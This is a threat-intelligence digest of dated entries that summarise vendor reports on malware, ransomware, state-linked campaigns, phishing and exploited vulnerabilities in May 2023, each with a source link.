- SomeTwitter user @0xToxin has discovered malicious emails imitating DocuSign with HTML attachments recently.
—
- Intel Source:
- Intezer
- Intel Name:
- CryptoClippy_actively_expanding_its_capabilities
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Intezer analysts shared the details of the indication that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.
Source:
https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- AceCryptor_cruptor_operation
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- ESET researchers shared details about a widespreaded cryptor, operating as a cryptor-as-a-service used by tens of malware families.
Source:
https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/
—
- Intel Source:
- Inky
- Intel Name:
- ChatGPT_safisticated_Phishing_Scam
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- The Inky reserachers observed that cybercriminals have begun impersonating the brand in a sophisticated personalized phishing campaign ChatGPT whose impersonation fuels a Clever Phishing Scam.
Source:
https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam
—
- Intel Source:
- Cyble
- Intel Name:
- The_Invicta_Stealer_Spreading
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researcher Lab team discovered a new stealer called Invicta Stealer. The developer who is in charge of this malware is heavy involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.
Source:
https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/
—
- Intel Source:
- Cyble
- Intel Name:
- Ducktail_Malware_targets_a_high_profile_accounts
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Recently Cyble researchers recently discovered Ducktail malware that targets specifically Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim’s Social Media account. The malware operation purpose is to gain control of Social Media Business accounts with adequate access privileges. TAs then use their acquired access to conduct advertisements for their financial gain.
—
- Intel Source:
- NSA / Secureworks
- Intel Name:
- Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
- Date of Scan:
- 2023-05-30
- Impact:
- MEDIUM
- Summary:
- SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
—
- Intel Source:
- Cyble
- Intel Name:
- Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.
Source:
https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
- Date of Scan:
- 2023-05-29
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.
—
- Intel Source:
- CADO Security
- Intel Name:
- Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
- Date of Scan:
- 2023-05-29
- Impact:
- LOW
- Summary:
- CADO security researchers have identified an updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
Source:
https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_Delivering_via_Encrypted_Messages
- Date of Scan:
- 2023-05-28
- Impact:
- MEDIUM
- Summary:
- Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum – a newly identified malware strain called “MDBotnet.” Our analysis suggests that this malware is believed to originate from a Threat Actor (TA) linked to Russia.
Source:
https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Technical_Examination_of_Pikabot
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new malware trojan named Pikabot which emerged in early 2023 that consists of two components a loader and a core module.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
—
- Intel Source:
- Microsoft, CISA
- Intel Name:
- Volt_Typhoon_stealthy_activity
- Date of Scan:
- 2023-05-27
- Impact:
- HIGH
- Summary:
- Microsoft has discovered sneaky and malicious activity that targets on credential access and network system discovery attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft is sure that this Volt Typhoon campaign is targeting development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.
—
- Intel Source:
- Cyble
- Intel Name:
- Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered the increasing adoption of double extortion by ransomware groups is an alarming trend. We are witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers’ demands are fulfilled.
Source:
https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/
—
- Intel Source:
- Sentilone
- Intel Name:
- Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- SentinelLabs have tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance, and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.
Source:
https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_targeted_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script.
—
- Intel Source:
- ASEC
- Intel Name:
- Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.
—
- Intel Source:
- Cluster25
- Intel Name:
- Return_of_BlackByte_Ransomware_with_New_Technology_Version
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cluster25 Threat Intel Team have identified that BlackByte is a Ransomware-as-a-Service group that is known for the use of the homonymous malware that is constantly updated and spread in different variants. The team used the above function in a IDAPython script that allowed to retrieve all invocations to the functions responsible for the dynamic loading of the APIs in order to continue with the static analysis of the malware.
Source:
https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
—
- Intel Source:
- Cofense
- Intel Name:
- Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the HR Department’ and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_attacked_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security reserachers has discovered a watering hole attack on at least eight Israeli websites. The attack most likely was orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The Infected sites collect preliminary user information through a script. W
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agrius_threat_actor_attacks_against_Israel
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- A threat actor Agrius who is believed Iranian keep trying to attack against Israeli targets, hiding destructive impact of ransomware attacks.Recently the group deployed Moneybird, a new ransomware written in C++. Despite calling themselves as a new group name– Moneybird, this is yet another Agrius alias.
—
- Intel Source:
- Mandiant
- Intel Name:
- COSMICENERGY_new_OT_Malware_related_to_Russia
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, which was recognized as COSMICENERGY, uploaded by threat actor in Russia. The malware is capable of to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia.
Source:
https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response
—
- Intel Source:
- Checkpoint
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.
Source:
https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Espionage_Activity_UAC_0063
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department’s e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised), the first of which contained an attachment in the form of a document with a macro, and the second – reference to the same document.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Targeting_Windows_IIS_Web_Servers
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Lazarus group is known to receive support on a national scale, carrying out attacks against Windows IIS web servers.
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
- Date of Scan:
- 2023-05-26
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_GoldenJackal_APT_Group
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.
Source:
https://securelist.com/goldenjackal-apt-group/109677/
—
- Intel Source:
- ASEC
- Intel Name:
- StrelaStealer_Malware_Targeting_Spanish_Users
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.
—
- Intel Source:
- Fortinet
- Intel Name:
- Middle_East_Targeted_by_New_Kernel_Driver_Exploit
- Date of Scan:
- 2023-05-24
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.
Source:
https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified Several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of proof-of-concept exploit.
—
- Intel Source:
- DFIR Report
- Intel Name:
- IcedID_Macro_Ends_in_Nokoyawa_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.
Source:
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
—
- Intel Source:
- Esentire
- Intel Name:
- BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Esentire researchers have observed threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.
Source:
https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Bushitoken reseracher recently discovered an threat actor campaign that is using fake websites to distribute malware. It seems like this TTP to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator which is simply a convenient desktop version of the mobile authenticator app.
Source:
https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html
—
- Intel Source:
- Cyble
- Intel Name:
- AndoryuBot_s_DDOS_wild_behavior
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Source:
https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- TurkoRat_found_hiding_in_the_npm_package
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.
Source:
https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
—
- Intel Source:
- Cyble
- Intel Name:
- CapCut_s_Video_to_Deliver_Multiple_Stealers
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- Cyble Researchers recently discovered a couple of phishing websites disguised as video editing software. These ffake sites lure users into downloading and executing various types of malware families such as stealers, RAT, etc. In these campaigns, Threat Actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.
Source:
https://blog.cyble.com/2023/05/19/capcut-users-under-fire/
—
- Intel Source:
- Sophos
- Intel Name:
- Brute_Ratel_remains_rare_and_targeted
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.
Source:
https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_analysis_of_QakBot_Infrastructure
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- Team Cymru shared their research about their analysis of QakBot is full of various hypotheses being identified and tested. Their key findings are QakBot C2 servers are not separated by affiliate ID, QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns and Identification of three upstream C2 servers located in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
—
- Intel Source:
- Wordfence
- Intel Name:
- The_exploitation_of_critical_vulnerability_CVE_2023_32243
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Recently, Essential Addons for Elementor, a WordPress plugin had a released a patch for a critical vulnerability which is capable for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackSuit_Ransomware_ragets_VMware_ESXi_servers
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Cyble researchers from Labs observed an increase in the number of ransomware groups such as Cylance and Royal ransomware. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.
Source:
https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed with GoLang. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system like by taking screenshots.
—
- Intel Source:
- Cofense
- Intel Name:
- The_attackers_used_email_security_providers_for_spreading_phishing_attacks
- Date of Scan:
- 2023-05-18
- Impact:
- LOW
- Summary:
- Threat actors more often send malicious URLs within HTML attachments, which makes it more challenging for Secure Email gateways (SEGs) to block them. The Phishing Defence Centre did their analyses on a phishing campaign impersonating email security provider to trap recipients into providing their user credentials via malicious HTML attachment.
—
- Intel Source:
- CISA
- Intel Name:
- Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Uncovering_RedStinger_new
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- During the conflict between Russia and Ukraine began last year, there is a not only political conflict, there is no surprise that the cybersecurity landscape between these two countries has also been tense. The former reseracher from Malwarebytes Threat Intelligence Team discovered a new interesting bait that targeted the Eastern Ukraine region and reported that finding to the public and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (who it called Bad Magic).
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Python_Packages_via_Supply_Chain_Attacks
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.
—
- Intel Source:
- Symantec
- Intel Name:
- The_Lancefly_APT_group_using_Merdoor_backdoor
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The Lancefly (APT) group is attacking and target organizations in South and Southeast Asiausing with a custom-written backdoor. Lancefly’s custom malware is named Merdoor, is a powerful backdoor that existed since 2018. The recent targets lately are based in South and Southeast Asia, attacking areas including government, aviation, education, and telecoms. Symantec researchers observed that activity also appeared to be highly targeted, with only a small number of machines infected.
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_8220_Gang_Strategies
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- Reserachers documentedon the gang’s recent activities of 8220 Gang who has been active in recent months. Researchers shared in their article aboutk observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506 captured by one of our honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands through an HTTP request remotely with a specifically crafted XML document.
Source:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Water_Orthrus_s_New_Campaigns
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spreaded CopperStealer malware via pay-per-install (PPI) networks. In March 2023, we observed two campaigns delivering new malware that we named CopperStealth and CopperPhish. Both malware have characteristics that are close to those of CopperStealer and are likely developed by the same author, leading the researchers believe that these campaigns are likely Water Orthrus’ new activities.
—
- Intel Source:
- Malware Bytes
- Intel Name:
- The_Aurora_stealer_via_Invalid_Printer_loader
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malware Bytes Lab shared their discovery about this malicious campaing and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legit ans very much resembled what you’d expect from Microsoft. That fake security update was using a newly identified loader that at the time of the campaign was oblivious to malware sandboxes and bypassed practically all antivirus engines. Malware Bytes Lab tool patched that loader and identified its actual payload as Aurora stealer.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_variant_Rancoz
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- This month Cyble researchers onserved a ransomware variant called Rancoz, that was identified by a researcher @siri_urz. During the investigation, it has been observed that this ransomware is similar and overlaps with the Vice Society ransomware.
Source:
https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- LokiLocker_Ransomware_Distributed_in_Korea
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center(ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits
—
- Intel Source:
- Cyble
- Intel Name:
- An_In_Depth_Look_at_Akira_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.
Source:
https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- Maori_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered a new interesting lure that targeted the Eastern Ukraine region and reported that finding to the public. Moreover, we started tracking the actor behind it, which we internally codenamed Red Stinger.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- Securonix
- Intel Name:
- Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Last couple months was observed an interesting and ongoing attack campaign which was identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims. Securonix dived into this campaign by taking an in-depth technical analysis.
Source:
https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
—
- Intel Source:
- Deep Instinct Blog
- Intel Name:
- A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
- Date of Scan:
- 2023-05-15
- Impact:
- MEDIUM
- Summary:
- BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.
Source:
https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
—
- Intel Source:
- Mcafee
- Intel Name:
- Analysis_of_a_evasive_Shellcode
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- McAfee researchers have observed a NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_CVE_2023_27350
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
—
- Intel Source:
- Dragos
- Intel Name:
- A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- Last week, an known hacker group tried and didn’t have a success at an extortion scheme against Dragos. Nothing was breached at Dragos systems, including anything related to the Dragos Platform. Dragos has shared what happened during a recent incident of failed extortion scheme against them – Dragos. The cybercriminal group attempted to compromise Drago’s information resources. The criminal group got access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.
Source:
https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
- Date of Scan:
- 2023-05-13
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Statistics_May_1_7th_2023
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- ASEC lab researchers continiusly monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15st, 2023 and provide statistical information on each type.
—
- Intel Source:
- Mcafee
- Intel Name:
- The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- McAfee researchers have deeply analyzed the GULoader campaigns and found, a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- ASEC
- Intel Name:
- CLR_SqlShell_malware_Attack_MS_SQL_Servers
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.
—
- Intel Source:
- Cert-PL
- Intel Name:
- Malspam_Campaign_Delivering_PowerDash
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They also dubbed this malware family as “PowerDash” because of the “/dash” path on C2 server, used as a gateway for bots.
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- FortiGate researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking
—
- Intel Source:
- Bitdefender
- Intel Name:
- DownEx_Espionage_activity_in_Central_Asia
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
